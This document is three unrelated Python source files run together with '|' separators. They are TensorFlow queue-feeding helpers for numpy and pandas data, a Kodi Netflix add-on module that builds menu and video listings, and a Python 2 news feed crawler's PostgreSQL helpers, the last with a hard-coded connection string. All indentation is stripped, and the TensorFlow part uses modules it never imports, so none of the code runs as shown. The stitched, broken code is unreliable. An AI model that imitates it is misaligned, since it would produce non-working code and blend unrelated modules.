from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import queue_runner
# pylint: disable=g-import-not-at-top
try:
import pandas as pd
HAS_PANDAS = True
except ImportError:
HAS_PANDAS = False
class _ArrayFeedFn(object):
"""Creates feed dictionaries from numpy arrays."""
def __init__(self,
placeholders,
array,
batch_size,
random_start=False,
seed=None):
if len(placeholders) != 2:
raise ValueError("_array_feed_fn expects 2 placeholders; got {}.".format(
len(placeholders)))
self._placeholders = placeholders
self._array = array
self._max = len(array)
self._batch_size = batch_size
random.seed(seed)
self._trav = random.randrange(self._max) if random_start else 0
def __call__(self):
integer_indexes = [j % self._max
for j in range(self._trav, self._trav + self._batch_size)
]
self._trav = (integer_indexes[-1] + 1) % self._max
return {self._placeholders[0]: integer_indexes,
self._placeholders[1]: self._array[integer_indexes]}
class _PandasFeedFn(object):
"""Creates feed dictionaries from pandas `DataFrames`."""
def __init__(self,
placeholders,
dataframe,
batch_size,
random_start=False,
seed=None):
if len(placeholders) != len(dataframe.columns) + 1:
raise ValueError("Expected {} placeholders; got {}.".format(
len(dataframe.columns), len(placeholders)))
self._index_placeholder = placeholders[0]
self._col_placeholders = placeholders[1:]
self._dataframe = dataframe
self._max = len(dataframe)
self._batch_size = batch_size
random.seed(seed)
self._trav = random.randrange(self._max) if random_start else 0
def __call__(self):
integer_indexes = [j % self._max
for j in range(self._trav, self._trav + self._batch_size)
]
self._trav = (integer_indexes[-1] + 1) % self._max
result = self._dataframe.iloc[integer_indexes]
cols = [result[col].values for col in result.columns]
feed_dict = dict(zip(self._col_placeholders, cols))
feed_dict[self._index_placeholder] = result.index.values
return feed_dict
def enqueue_data(data,
capacity,
shuffle=False,
min_after_dequeue=None,
num_threads=1,
seed=None,
name="enqueue_input",
enqueue_size=1):
"""Creates a queue filled from a numpy array or pandas `DataFrame`.
Returns a queue filled with the rows of the given array or `DataFrame`. In
the case of a pandas `DataFrame`, the first enqueued `Tensor` corresponds to
the index of the `DataFrame`. For numpy arrays, the first enqueued `Tensor`
contains the row number.
Args:
data: a numpy `ndarray or` pandas `DataFrame` that will be read into the
queue.
capacity: the capacity of the queue.
shuffle: whether or not to shuffle the rows of the array.
min_after_dequeue: minimum number of elements that can remain in the queue
after a dequeue operation. Only used when `shuffle` is true. If not set,
defaults to `capacity` / 4.
num_threads: number of threads used for reading and enqueueing.
seed: used to seed shuffling and reader starting points.
name: a scope name identifying the data.
enqueue_size: the number of rows to enqueue per step.
Returns:
A queue filled with the rows of the given array or `DataFrame`.
Raises:
TypeError: `data` is not a Pandas `DataFrame` or a numpy `ndarray`.
"""
with ops.name_scope(name):
if isinstance(data, np.ndarray):
types = [dtypes.int64, dtypes.as_dtype(data.dtype)]
queue_shapes = [(), data.shape[1:]]
get_feed_fn = _ArrayFeedFn
elif HAS_PANDAS and isinstance(data, pd.DataFrame):
types = [dtypes.as_dtype(dt)
for dt in [data.index.dtype] + list(data.dtypes)]
queue_shapes = [() for _ in types]
get_feed_fn = _PandasFeedFn
else:
raise TypeError(
"data must be either a numpy array or pandas DataFrame if pandas is "
"installed; got {}".format(type(data).__name__))
if shuffle:
min_after_dequeue = int(capacity / 4 if min_after_dequeue is None else
min_after_dequeue)
queue = data_flow_ops.RandomShuffleQueue(capacity,
min_after_dequeue,
dtypes=types,
shapes=queue_shapes,
seed=seed)
else:
if num_threads > 1:
# TODO(jamieas): Add TensorBoard warning here once available.
logging.warning(
"enqueue_data was called with shuffle=False and num_threads > 1. "
"This will create multiple threads, all reading the "
"array/dataframe in order. If you want examples read in order, use"
" one thread; if you want multiple threads, enable shuffling.")
min_after_dequeue = 0 # just for the summary text
queue = data_flow_ops.FIFOQueue(capacity,
dtypes=types,
shapes=queue_shapes)
enqueue_ops = []
feed_fns = []
for i in range(num_threads):
# Note the placeholders have no shapes, so they will accept any
# enqueue_size. enqueue_many below will break them up.
placeholders = [array_ops.placeholder(t) for t in types]
enqueue_ops.append(queue.enqueue_many(placeholders))
seed_i = None if seed is None else (i + 1) * seed
feed_fns.append(get_feed_fn(placeholders,
data,
enqueue_size,
random_start=shuffle,
seed=seed_i))
runner = fqr.FeedingQueueRunner(queue=queue,
enqueue_ops=enqueue_ops,
feed_fns=feed_fns)
queue_runner.add_queue_runner(runner)
full = (math_ops.cast(
math_ops.maximum(0, queue.size() - min_after_dequeue),
dtypes.float32) * (1. / (capacity - min_after_dequeue)))
# Note that name contains a '/' at the end so we intentionally do not place
# a '/' after %s below.
summary_name = ("queue/%sfraction_over_%d_of_%d_full" %
(queue.name, min_after_dequeue,
capacity - min_after_dequeue))
logging_ops.scalar_summary(summary_name, full)
return queue
|
|
# -*- coding: utf-8 -*-
"""
Copyright (C) 2017 Sebastian Golasch (plugin.video.netflix)
Copyright (C) 2020 Stefano Gottardo (original implementation module)
Generate the data to build a directory of xbmcgui ListItem's
SPDX-License-Identifier: MIT
See LICENSES/MIT.md for more information.
"""
from __future__ import absolute_import, division, unicode_literals
from future.utils import iteritems
import resources.lib.common as common
from resources.lib.database.db_utils import (TABLE_MENU_DATA)
from resources.lib.globals import G
from resources.lib.kodi.context_menu import generate_context_menu_items, generate_context_menu_profile
from resources.lib.kodi.infolabels import get_color_name, add_info_dict_item, set_watched_status
from resources.lib.services.nfsession.directorybuilder.dir_builder_utils import (get_param_watched_status_by_profile,
add_items_previous_next_page,
get_availability_message)
from resources.lib.utils.logging import measure_exec_time_decorator
try: # Python 2
unicode
except NameError: # Python 3
unicode = str # pylint: disable=redefined-builtin
# This module convert a DataType object like VideoListSorted (that contains a list of items videos, items, etc)
# in a list of dict items very similar to xbmcgui.ListItem, that the client-frontend will convert into real ListItem's
# (because currently the xbmcgui.ListItem object is not serializable)
# The dict keys are managed from the method '_convert_list' of listings.py
# All build methods should return same tuple data ('directory items', 'extra data dict')
# common_data dict is used to avoid cpu overload in consecutive accesses to other resources improve a lot the execution
@measure_exec_time_decorator(is_immediate=True)
def build_mainmenu_listing(loco_list):
"""Builds the main menu listing (my list, continue watching, etc.)"""
from resources.lib.kodi.context_menu import generate_context_menu_mainmenu
directory_items = []
common_data = {
'profile_language_code': G.LOCAL_DB.get_profile_config('language', ''),
'supplemental_info_color': get_color_name(G.ADDON.getSettingInt('supplemental_info_color'))
}
for menu_id, data in iteritems(G.MAIN_MENU_ITEMS):
if data.get('has_show_setting', True) and not G.ADDON.getSettingBool('_'.join(('show_menu', menu_id))):
continue
if data['loco_known']:
list_id, video_list = loco_list.find_by_context(data['loco_contexts'][0])
if not list_id:
continue
menu_title = video_list['displayName']
dict_item = _create_videolist_item(list_id, video_list, data, common_data, static_lists=True)
else:
menu_title = common.get_local_string(data['label_id']) if data.get('label_id') else 'Missing menu title'
menu_description = (common.get_local_string(data['description_id'])
if data['description_id'] is not None
else '')
dict_item = {
'url': common.build_url(data['path'], mode=G.MODE_DIRECTORY),
'label': menu_title,
'art': {'icon': data['icon']},
'info': {'plot': menu_description}, # The description
'is_folder': True
}
dict_item['menu_items'] = generate_context_menu_mainmenu(menu_id)
directory_items.append(dict_item)
# Save the menu titles, to reuse it when will be open the content of menus
G.LOCAL_DB.set_value(menu_id, {'title': menu_title}, TABLE_MENU_DATA)
# Add profiles menu
directory_items.append({
'url': common.build_url(['profiles'], mode=G.MODE_DIRECTORY),
'label': common.get_local_string(13200), # "Profiles"
'art': {'icon': 'DefaultUser.png'},
'is_folder': True
})
G.CACHE_MANAGEMENT.execute_pending_db_ops()
return directory_items, {}
def build_profiles_listing(preselect_guid=None, detailed_info=True):
"""Builds the profiles listing"""
directory_items = []
preselect_guid = preselect_guid or G.LOCAL_DB.get_active_profile_guid()
autoselect_guid = G.LOCAL_DB.get_value('autoselect_profile_guid')
library_playback_guid = G.LOCAL_DB.get_value('library_playback_profile_guid')
for guid in G.LOCAL_DB.get_guid_profiles():
directory_items.append(_create_profile_item(guid,
(guid == preselect_guid),
(guid == autoselect_guid),
(guid == library_playback_guid),
detailed_info))
return directory_items, {}
def _create_profile_item(profile_guid, is_selected, is_autoselect, is_library_playback, detailed_info):
profile_name = G.LOCAL_DB.get_profile_config('profileName', '???', guid=profile_guid)
profile_attributes = []
if G.LOCAL_DB.get_profile_config('isPinLocked', False, guid=profile_guid):
profile_attributes.append('[COLOR red]' + common.get_local_string(20068) + '[/COLOR]')
if G.LOCAL_DB.get_profile_config('isAccountOwner', False, guid=profile_guid):
profile_attributes.append(common.get_local_string(30221))
if G.LOCAL_DB.get_profile_config('isKids', False, guid=profile_guid):
profile_attributes.append(common.get_local_string(30222))
if is_autoselect and detailed_info:
profile_attributes.append(common.get_local_string(30054))
if is_library_playback and detailed_info:
profile_attributes.append(common.get_local_string(30051))
attributes_desc = '[CR]'.join(profile_attributes) + '[CR]' if profile_attributes else ''
description = attributes_desc + '[' + G.LOCAL_DB.get_profile_config('language_desc', '', guid=profile_guid) + ']'
if detailed_info:
menu_items = generate_context_menu_profile(profile_guid, is_autoselect, is_library_playback)
else:
menu_items = []
dict_item = {
'label': profile_name,
'properties': {'nf_guid': profile_guid, 'nf_description': description.replace('[CR]', ' - ')},
'art': {'icon': G.LOCAL_DB.get_profile_config('avatar', '', guid=profile_guid)},
'info': {'plot': description}, # The description
'is_selected': is_selected,
'menu_items': menu_items,
'url': common.build_url(pathitems=['home'],
params={'switch_profile_guid': profile_guid},
mode=G.MODE_DIRECTORY),
'is_folder': True
}
return dict_item
@measure_exec_time_decorator(is_immediate=True)
def build_season_listing(season_list, tvshowid, pathitems=None):
"""Build a season listing"""
common_data = {
'supplemental_info_color': get_color_name(G.ADDON.getSettingInt('supplemental_info_color')),
'profile_language_code': G.LOCAL_DB.get_profile_config('language', '')
}
directory_items = [_create_season_item(tvshowid, seasonid_value, season, season_list, common_data)
for seasonid_value, season
in iteritems(season_list.seasons)]
# add_items_previous_next_page use the new value of perpetual_range_selector
add_items_previous_next_page(directory_items, pathitems, season_list.perpetual_range_selector, tvshowid)
G.CACHE_MANAGEMENT.execute_pending_db_ops()
return directory_items, {'title': season_list.tvshow['title'] + ' - ' + common.get_local_string(20366)[2:]}
def _create_season_item(tvshowid, seasonid_value, season, season_list, common_data):
seasonid = tvshowid.derive_season(seasonid_value)
dict_item = {
'video_id': seasonid_value,
'media_type': seasonid.mediatype,
'label': season['summary']['name'],
'is_folder': True,
'properties': {'nf_videoid': seasonid.to_string()}
}
add_info_dict_item(dict_item, seasonid, season, season_list.data, False, common_data)
dict_item['url'] = common.build_url(videoid=seasonid, mode=G.MODE_DIRECTORY)
dict_item['menu_items'] = generate_context_menu_items(seasonid, False, None)
return dict_item
@measure_exec_time_decorator(is_immediate=True)
def build_episode_listing(episodes_list, seasonid, pathitems=None):
"""Build a episodes listing of a season"""
common_data = {
'params': get_param_watched_status_by_profile(),
'set_watched_status': G.ADDON.getSettingBool('ProgressManager_enabled'),
'supplemental_info_color': get_color_name(G.ADDON.getSettingInt('supplemental_info_color')),
'profile_language_code': G.LOCAL_DB.get_profile_config('language', ''),
'active_profile_guid': G.LOCAL_DB.get_active_profile_guid()
}
directory_items = [_create_episode_item(seasonid, episodeid_value, episode, episodes_list, common_data)
for episodeid_value, episode
in iteritems(episodes_list.episodes)]
# add_items_previous_next_page use the new value of perpetual_range_selector
add_items_previous_next_page(directory_items, pathitems, episodes_list.perpetual_range_selector)
G.CACHE_MANAGEMENT.execute_pending_db_ops()
return directory_items, {'title': episodes_list.tvshow['title'] + ' - ' + episodes_list.season['summary']['name']}
def _create_episode_item(seasonid, episodeid_value, episode, episodes_list, common_data):
is_playable = episode['summary']['isPlayable']
episodeid = seasonid.derive_episode(episodeid_value)
dict_item = {'video_id': episodeid_value,
'media_type': episodeid.mediatype if is_playable else None,
'label': episode['title'],
'is_folder': False,
'properties': {'nf_videoid': episodeid.to_string()}}
add_info_dict_item(dict_item, episodeid, episode, episodes_list.data, False, common_data)
set_watched_status(dict_item, episode, common_data)
if is_playable:
dict_item['url'] = common.build_url(videoid=episodeid, mode=G.MODE_PLAY, params=common_data['params'])
dict_item['menu_items'] = generate_context_menu_items(episodeid, False, None)
else:
# The video is not playable, try check if there is a date
dict_item['properties']['nf_availability_message'] = get_availability_message(episode)
dict_item['url'] = common.build_url(['show_availability_message'], mode=G.MODE_ACTION)
return dict_item
@measure_exec_time_decorator(is_immediate=True)
def build_loco_listing(loco_list, menu_data, force_use_videolist_id=False, exclude_loco_known=False):
"""Build a listing of video lists (LoCo)"""
# If contexts are specified (loco_contexts in the menu_data), then the loco_list data will be filtered by
# the specified contexts, otherwise all LoCo items will be added
common_data = {
'menu_data': menu_data,
'supplemental_info_color': get_color_name(G.ADDON.getSettingInt('supplemental_info_color')),
'profile_language_code': G.LOCAL_DB.get_profile_config('language', '')
}
contexts = menu_data.get('loco_contexts')
items_list = loco_list.lists_by_context(contexts) if contexts else iteritems(loco_list.lists)
directory_items = []
for video_list_id, video_list in items_list:
menu_parameters = common.MenuIdParameters(video_list_id)
if not menu_parameters.is_menu_id:
continue
list_id = (menu_parameters.context_id
if menu_parameters.context_id and not force_use_videolist_id
else video_list_id)
# Keep only some type of menus: 28=genre, 101=top 10
if exclude_loco_known:
if menu_parameters.type_id not in ['28', '101']:
continue
if menu_parameters.type_id == '101':
# Top 10 list can be obtained only with 'video_list' query
force_use_videolist_id = True
# Create dynamic sub-menu info in MAIN_MENU_ITEMS
sub_menu_data = menu_data.copy()
sub_menu_data['path'] = [menu_data['path'][0], list_id, list_id]
sub_menu_data['loco_known'] = False
sub_menu_data['loco_contexts'] = None
sub_menu_data['content_type'] = menu_data.get('content_type', G.CONTENT_SHOW)
sub_menu_data['force_use_videolist_id'] = force_use_videolist_id
sub_menu_data['title'] = video_list['displayName']
sub_menu_data['initial_menu_id'] = menu_data.get('initial_menu_id', menu_data['path'][1])
sub_menu_data['no_use_cache'] = menu_parameters.type_id == '101'
G.LOCAL_DB.set_value(list_id, sub_menu_data, TABLE_MENU_DATA)
directory_items.append(_create_videolist_item(list_id, video_list, sub_menu_data, common_data))
G.CACHE_MANAGEMENT.execute_pending_db_ops()
return directory_items, {}
def _create_videolist_item(list_id, video_list, menu_data, common_data, static_lists=False):
if static_lists and G.is_known_menu_context(video_list['context']):
pathitems = list(menu_data['path']) # Make a copy
pathitems.append(video_list['context'])
else:
# It is a dynamic video list / menu context
if menu_data.get('force_use_videolist_id', False):
path = 'video_list'
else:
path = 'video_list_sorted'
pathitems = [path, menu_data['path'][1], list_id]
dict_item = {'label': video_list['displayName'],
'is_folder': True}
add_info_dict_item(dict_item, video_list.videoid, video_list, video_list.data, False, common_data,
art_item=video_list.artitem)
# Add possibility to browse the sub-genres (see build_video_listing)
sub_genre_id = video_list.get('genreId')
params = {'sub_genre_id': unicode(sub_genre_id)} if sub_genre_id else None
dict_item['url'] = common.build_url(pathitems,
params=params,
mode=G.MODE_DIRECTORY)
return dict_item
@measure_exec_time_decorator(is_immediate=True)
def build_video_listing(video_list, menu_data, sub_genre_id=None, pathitems=None, perpetual_range_start=None,
mylist_items=None):
"""Build a video listing"""
common_data = {
'params': get_param_watched_status_by_profile(),
'mylist_items': mylist_items,
'set_watched_status': G.ADDON.getSettingBool('ProgressManager_enabled'),
'supplemental_info_color': get_color_name(G.ADDON.getSettingInt('supplemental_info_color')),
'mylist_titles_color': (get_color_name(G.ADDON.getSettingInt('mylist_titles_color'))
if menu_data['path'][1] != 'myList'
else None),
'profile_language_code': G.LOCAL_DB.get_profile_config('language', ''),
'ctxmenu_remove_watched_status': menu_data['path'][1] == 'continueWatching',
'active_profile_guid': G.LOCAL_DB.get_active_profile_guid()
}
directory_items = [_create_video_item(videoid_value, video, video_list, perpetual_range_start, common_data)
for videoid_value, video
in iteritems(video_list.videos)]
# If genre_id exists add possibility to browse LoCo sub-genres
if sub_genre_id and sub_genre_id != 'None':
# Create dynamic sub-menu info in MAIN_MENU_ITEMS
menu_id = 'subgenre_' + sub_genre_id
sub_menu_data = menu_data.copy()
sub_menu_data['path'] = [menu_data['path'][0], menu_id, sub_genre_id]
sub_menu_data['loco_known'] = False
sub_menu_data['loco_contexts'] = None
sub_menu_data['content_type'] = menu_data.get('content_type', G.CONTENT_SHOW)
sub_menu_data.update({'title': common.get_local_string(30089)})
sub_menu_data['initial_menu_id'] = menu_data.get('initial_menu_id', menu_data['path'][1])
G.LOCAL_DB.set_value(menu_id, sub_menu_data, TABLE_MENU_DATA)
# Create the folder for the access to sub-genre
folder_dict_item = {
'url': common.build_url(['genres', menu_id, sub_genre_id], mode=G.MODE_DIRECTORY),
'label': common.get_local_string(30089),
'art': {'icon': 'DefaultVideoPlaylists.png'},
'info': {'plot': common.get_local_string(30088)}, # The description
'is_folder': True
}
directory_items.insert(0, folder_dict_item)
# add_items_previous_next_page use the new value of perpetual_range_selector
add_items_previous_next_page(directory_items, pathitems, video_list.perpetual_range_selector, sub_genre_id)
G.CACHE_MANAGEMENT.execute_pending_db_ops()
return directory_items, {}
def _create_video_item(videoid_value, video, video_list, perpetual_range_start, common_data):
is_playable = video['availability']['isPlayable']
videoid = common.VideoId.from_videolist_item(video)
is_folder = videoid.mediatype == common.VideoId.SHOW
is_in_mylist = videoid in common_data['mylist_items']
dict_item = {'video_id': videoid_value,
'media_type': videoid.mediatype if is_playable else None,
'label': video['title'],
'is_folder': is_folder,
'properties': {'nf_videoid': videoid.to_string(),
'nf_is_in_mylist': str(is_in_mylist),
'nf_perpetual_range_start': perpetual_range_start}}
add_info_dict_item(dict_item, videoid, video, video_list.data, is_in_mylist, common_data)
set_watched_status(dict_item, video, common_data)
if is_playable:
dict_item['url'] = common.build_url(videoid=videoid,
mode=G.MODE_DIRECTORY if is_folder else G.MODE_PLAY,
params=None if is_folder else common_data['params'])
dict_item['menu_items'] = generate_context_menu_items(videoid, is_in_mylist, perpetual_range_start,
common_data['ctxmenu_remove_watched_status'])
else:
# The video is not playable, try check if there is a date
dict_item['properties']['nf_availability_message'] = get_availability_message(video)
dict_item['url'] = common.build_url(['show_availability_message'], mode=G.MODE_ACTION)
return dict_item
@measure_exec_time_decorator(is_immediate=True)
def build_subgenres_listing(subgenre_list, menu_data):
"""Build a listing of sub-genres list"""
directory_items = []
for index, subgenre_data in subgenre_list.lists: # pylint: disable=unused-variable
# Create dynamic sub-menu info in MAIN_MENU_ITEMS
sel_video_list_id = unicode(subgenre_data['id'])
sub_menu_data = menu_data.copy()
sub_menu_data['path'] = [menu_data['path'][0], sel_video_list_id, sel_video_list_id]
sub_menu_data['loco_known'] = False
sub_menu_data['loco_contexts'] = None
sub_menu_data['content_type'] = menu_data.get('content_type', G.CONTENT_SHOW)
sub_menu_data['title'] = subgenre_data['name']
sub_menu_data['initial_menu_id'] = menu_data.get('initial_menu_id', menu_data['path'][1])
G.LOCAL_DB.set_value(sel_video_list_id, sub_menu_data, TABLE_MENU_DATA)
directory_items.append(_create_subgenre_item(sel_video_list_id,
subgenre_data,
sub_menu_data))
return directory_items, {}
def _create_subgenre_item(video_list_id, subgenre_data, menu_data):
pathitems = ['video_list_sorted', menu_data['path'][1], video_list_id]
dict_item = {
'url': common.build_url(pathitems, mode=G.MODE_DIRECTORY),
'is_folder': True,
'label': subgenre_data['name']
}
return dict_item
|
|
#
# feed sucker common functions
#
import re
import psycopg2
import psycopg2.extras
import psycopg2.extensions
import random
import urlparse
import pdb
#from BeautifulSoup import BeautifulSoup, Tag, NavigableString
import urllib
import urlparse
import datetime, pytz
import traceback
import util
import iso_map
#crashes: from article_extractor import dechrome
#crashes: import lxml, lxml.html, lxml.html.clean, lxml.html.soupparser
#does not crash: import BeautifulSoup
#stalls: import lxml
import urllib,urllib2,socket,urlparse
################ database ###############
prepared = []
def extract_hostname(URL):
#m = re.compile('[^:]*://([^/#\?]*)[/#\?]*.*').match(URL)
#if m: return m.group(1)
sp = urlparse.urlsplit(URL)
assert sp.scheme.lower() in ['http', 'https']
#assert ' ' not in URL # aparently dela ce je presledk not .. a ga urllib escapa?
assert ' ' not in sp.netloc
assert len(sp.netloc) >= 5
return sp.netloc
def mk_timestamp(t):
if not t: return '1000-01-01 00:00:01'
else: return str(t.tm_year) + "-" + str(t.tm_mon) + "-" + str(t.tm_mday) + " " + str(t.tm_hour) + ":" + str(t.tm_min) + ":" + str(t.tm_sec)
###
def DB_connect(appname=None):
db = psycopg2.extras.DictConnection("host=maximus.ijs.si dbname=news user=news password=XXX_GITHUB_XXX")
psycopg2.extensions.register_type(psycopg2.extensions.UNICODE)
psycopg2.extensions.register_type(psycopg2.extensions.UNICODEARRAY)
c = db.cursor()
c.execute("SET bytea_output TO 'escape'") # za psycopg2 < 2.4
if appname:
c.execute("SET application_name TO %s", (appname,))
# c.execute('SET DATESTYLE TO \'ISO\'')
db.commit()
return db
def DB_exec(db, cmd):
c = db.cursor()
c.execute(cmd)
c.close()
db.commit()
def DBod(curs):
r = curs.fetchone()
if r:
return dict(r)
else: return None
def DB_prepare(db, clin):
c = db.cursor()
for classes, name, types, command in prepared:
if len(classes & clin) > 0:
c.execute("PREPARE %s (%s) AS %s" % (name, ','.join(types), command))
c.close()
db.commit()
## feed sucker
# tle je treba dodat da site ne sme bit zaklenjen pa to ...
SQL_FIND_FEEDS = "SELECT * FROM feed WHERE NOT disabled AND next_scan < NOW() ORDER BY next_scan ASC LIMIT 1"
SQL_FIND_NEXT = "SELECT (next_scan-NOW())::reltime::int AS next FROM feed WHERE NOT disabled ORDER BY next_scan ASC LIMIT 1"
def DB_get_next_random_feed(db):
#print "get next random feed"
c = db.cursor()
c.execute(SQL_FIND_FEEDS) # lock for update
r = DBod(c)
return r
def DB_release_feed(db, f):
pass
def DB_get_next_feed_timestamp(db):
#print "get timeout"
c = db.cursor()
c.execute(SQL_FIND_NEXT)
r = DBod(c)
return r
def DB_log_feed_suck(db, feed_id, feed_site_id, http_code, note=None, n_e=None, n_i=None, unchanged=None):
#print "logging feed=%d code=%d note=%s" % (feed_id, http_code, note)
c = db.cursor()
c.execute("INSERT INTO feed_suck_log (feedid, feedsiteid, HTTP_code, note, n_e, n_i, unchanged) VALUES (%s, %s, %s, %s, %s, %s, %s)", (feed_id, feed_site_id, http_code, note, n_e, n_i, unchanged))
db.commit()
def DB_disable_feed(db, id, now=False, flag=3):
if now:
print "db> Disabling feed %d with flag %d" % (id,flag)
c = db.cursor()
c.execute("UPDATE feed SET disabled=true, flag=%s, last_scan=now() WHERE id=%s", (flag,id,))
db.commit()
else:
print "db> Conditionally disabling feed %d with flag 11" % id
c = db.cursor()
c.execute("UPDATE feed SET failures=failures+1, disabled = disabled OR (failures>4), flag=11 WHERE id=%s", (id,))
db.commit()
def try_slice(l, n):
try:
return l[:n]
except:
return None
def DB_update_feed(db, feed, suck, last_ts):
#print "db> Updating feed %d and feed info" % feed['id']
c = db.cursor()
etag=title=description=language=copyright=pub_date=ttl=None
if 'etag' in suck: etag=suck.etag
if 'title' in suck.feed: title=try_slice(suck.feed.title,1000)
if 'description' in suck.feed: description=try_slice(suck.feed.description,10000)
if 'language' in suck.feed:
language = (suck.feed.language or '').split('-')[0]
if language not in iso_map.iso3to2:
language = iso_map.iso2to3.get(language, None)
if 'copyright' in suck.feed: copyright=try_slice(suck.feed.copyright,100000)
if 'updated_parsed' in suck.feed: pub_date=suck.feed.updated_parsed
if 'ttl' in suck.feed: ttl=suck.feed.ttl
c.execute("UPDATE feed SET last_etag=%s, failures=0, pruning_ts_last=%s WHERE id=%s", (psycopg2.Binary(etag) if etag else None, last_ts, feed['id']))
# !bn: tegale res ni treba ob vsakmu feed-updateju flushat v bazo .. zamenji s stored proceduro? -- sej updatea se samo na 7 dni; selecta se pa vedno..
c.execute("UPDATE feed_ps SET title=%s, description=%s, language=%s, copyright=%s, pub_date=%s, published_ttl=%s, updated=now() WHERE feedid = %s AND updated < (now() - (7*86400)::reltime)", (title, description, language, copyright, mk_timestamp(pub_date), ttl, feed['id']))
db.commit()
def DB_update_feed_scan(db, feed):
#print "db> Updating feed next_scan"
c = db.cursor()
c.execute("UPDATE feed SET last_scan=NOW(), next_scan = (NOW() + (%s*(0.5+random()))::int::reltime) WHERE id = %s", (feed['effective_ttl'], feed['id']))
db.commit()
# !bn: upam da se ti dve funkciji [zgorna, spodna] ne kliceta socasno ?
def DB_update_feed_stat(db, feed, n_e, n_i):
if n_i == 0: unchanged = feed['unchanged_iter'] + 1
else: unchanged = 0
if n_e == 0: overlap = 1
else: overlap = (n_i+0.0) / float(n_e)
#print "db> Updating feed stat to %d %f" % (unchanged, overlap)
c = db.cursor()
c.execute("UPDATE feed SET unchanged_iter=%s, last_overlap=%s, found_total=found_total+%s, found_new=found_new+%s WHERE id=%s", (unchanged, overlap, n_e, n_i, feed['id']))
db.commit()
###
def DB_find_site(db, hostname):
c=db.cursor()
c.execute("SELECT * FROM site WHERE hostname = %s LIMIT 1", (hostname,))
r = DBod(c)
return r
# !! perf: select po neindexiranem URLju
def DB_find_feed(db, URL):
c=db.cursor()
c.execute("SELECT * FROM feed WHERE URL = %s LIMIT 1", (URL,))
r = DBod(c)
return r
# !bn:storedproc kandidat
def DB_find_insert_site(db, hostname, feed_site=False, news_site=False):
assert hostname, "Won't insert NULL into site(hostname). fail."
site = DB_find_site(db, hostname)
if not site:
c = db.cursor()
c.execute("INSERT INTO site (hostname, is_a_feed_site, is_a_news_site) VALUES (%s,%s,%s)", (hostname,feed_site,news_site))
db.commit()
return DB_find_site(db, hostname)
else:
if (not site['is_a_feed_site'] and feed_site) or (not site['is_a_news_site'] and news_site):
c = db.cursor()
c.execute("UPDATE site SET is_a_feed_site=%s, is_a_news_site=%s WHERE id=%s",
(feed_site or site['is_a_feed_site'], news_site or site['is_a_news_site'], site['id']))
db.commit()
return DB_find_site(db, hostname)
return site
def DB_find_insert_feed(db, URL, regex='(.*)', disabled=False, trust_level=2, ftype=None):
feed = DB_find_feed(db, URL)
if feed:
return feed
else:
hostname = extract_hostname(URL)
try:
site = DB_find_insert_site(db, hostname, feed_site=True)
except:
raise
sid = site['id']
c = db.cursor()
c.execute("INSERT INTO feed (siteid, URL, regex, disabled, trust_level, type) VALUES (%s,%s,%s,%s,%s,%s) RETURNING id", (sid, URL, regex, disabled, trust_level, ftype))
fid = c.fetchone()[0]
c.execute("INSERT INTO feed_ps (feedid, feedsiteid) VALUES (%s, %s)", (fid, sid))
db.commit()
return DB_find_feed(db,URL)
def conv_time(t, default=None): # assume utc input for now ; !bn: check|fix!
try:
return datetime.datetime(*t.updated_parsed[:6], tzinfo=pytz.UTC) if ('updated_parsed' in t and t.updated_parsed) else default
except:
return default
# input: feedparsers result
def post_entry(db, feed, entry, acl=None, cutoff_ts = None):
global title
try:
pubdate = conv_time(entry, None)
if cutoff_ts:
if pubdate == None:
raise Exception("uberfail!")
elif pubdate < cutoff_ts: # strictly lt !
return (0,0,0,0,1)
if not 'link' in entry or not entry.link:
print "[%8d] --- faulty link" % (feed['id'],)
return (1,0,0,0,0)
grs = [x for x in entry.keys() if x.startswith('gml_') or x.startswith('georss_')]
title = util.textifyHtml(entry.title).replace('\n',' ') if 'title' in entry else None
# title = (dechrome.parseTitleFromCleartext([title], entry.link) or None) if title else None
gml = entry.georss_point if ('georss_point' in entry and entry.georss_point) else None
tags = [x['term'] for x in entry.tags] if 'tags' in entry else None
# explicitly linked images
img_links = [link.href for link in getattr(entry,'links',{}) if getattr(link,'type','').startswith('image/') and link.get('href','').strip()]
img = img_links[0] if img_links else None
# images emebedded in summary html
if not img:
img_links = re.findall('<img[^>]* src="([^"]+)"', getattr(entry,'summary',''))
img = img_links[0] if len(img_links) == 1 else None
## fugly hack
#if grs and len(grs) > 0: fff.write('%s\n' % str(grs))
#if tags and len(tags) > 0: fff.write('%s\n' % str(tags))
#if gml: fff.write('gml=%s\n' % str(gml))
#fff.flush()
return DB_insert_and_enqueue_article(db, feed, entry.link, pubdate=pubdate, title=title, gml=gml, tags=tags, img=img, acl=acl) + (0,)
except:
print traceback.format_exc()
return (1,0,0,0,0)
prepared.append(({'feedsuck'}, 'check_article', ('text',), "SELECT fa_feed_id AS feedid, fa_id AS id FROM feed_article_urls WHERE url_hash(url) = url_hash($1) AND url=$1"))
#prepared.append(({'feedsuck'}, 'check_article', ('text',), "SELECT feedid, id FROM feed_article WHERE (url_hash(url) = url_hash($1) AND url=$1) or (url_hash(final_url) = url_hash($1) AND final_url=$1)"))
prepared.append(({'feedsuck'}, 'check_article6', ('text',),"""
SELECT fa_feed_id AS feedid, fa_id AS id
FROM feed_article_urls
WHERE
month_id(ts) IN (month_id(now()), month_id(now())-1, month_id(now())-2)
AND
url_hash6(url) = url_hash6($1)
"""))
# !bn: v razmislek: ne preverja se eksplicitno urlja, ker je 48bit hash .. in ce je v 3 mescih collision .. tough luck.
#prepared.append(({'feedsuck'}, 'check_article6', ('text',),"""
#SELECT feedid, id FROM feed_article
#WHERE
# (
# (month_id(found) in (month_id(now()), month_id(now())-1, month_id(now())-2))
# and (
# (
# url_hash6(url) = url_hash6($1)
#-- AND url=$1
# )
# or
# (
# url_hash6(final_url) = url_hash6($1)
#-- AND final_url=$1
# )
# )
# )
#"""))
# oba queryja se da zdruzt z OR-om (check6pogoji or check3pogoji) in LIMIT 1; ampak zaenkrat(?) optimizer ne opaz da lahk short-circuita drug del pogojev ce ze dobi hit v check6
# v check6 ne preverjat url string matcha ... sicer nismo nc naredl .. 90% testov je pozitivnih, za kar mora it db v f_a tabelo gledat...
# ^ reasoning fail: db nardi bitmap heap scan recheck condition tud ce ne primerjamo urlja. mogoce samo ne bo urlja iz toasta nalagu, pa dobimo x2 ?
